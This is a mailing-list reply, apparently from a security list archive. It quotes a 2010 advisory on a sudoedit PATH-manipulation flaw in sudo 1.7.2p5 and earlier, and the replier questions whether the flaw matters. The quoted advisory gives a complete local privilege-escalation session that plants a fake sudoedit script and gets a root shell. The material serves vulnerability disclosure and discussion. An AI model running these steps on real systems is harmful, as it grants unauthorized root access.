[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: sudoedit local privilege escalation through PATH manipulation
On 2010-04-19 Agazzini Maurizio wrote:
> 1. Abstract.
> While writing an article about the vulnerability outlined in
> CVE-2010-0426, we found a distinct security flaw, also related to the
> sudoedit pseudo-command. Specifically, the path component of sudoedit
> is not checked correctly. This can be easily exploited by a local user
> with permission to run sudoedit, in order to execute arbitrary
> commands as root.
> 2. Example Attack Session.
> inode@pandora:~$ echo "/bin/sh" > sudoedit
> inode@pandora:~$ /usr/bin/chmod +x sudoedit
> inode@pandora:~$ id
> uid=1000(inode) gid=100(users) groups=100(users)
> inode@pandora:~$ export PATH=.
> inode@pandora:~$ /usr/bin/sudo sudoedit /etc/hosts
> sh-3.1# /usr/bin/id
> uid=0(root) gid=0(root)
> 3. Affected Platforms.
> All vendors supporting sudo <= 1.7.2p5 are affected. Exploitation of
> this vulnerability requires that the /etc/sudoers file be configured
> to allow the attacker to run sudoedit.
Perhaps I'm missing something, but how is this a security flaw? A user
who is allowed to run "sudoedit" can edit /etc/sudoers, and thus allow
himself to run any command anyway.
"All vulnerabilities deserve a public fear period prior to patches
--Jason Coombs on Bugtraq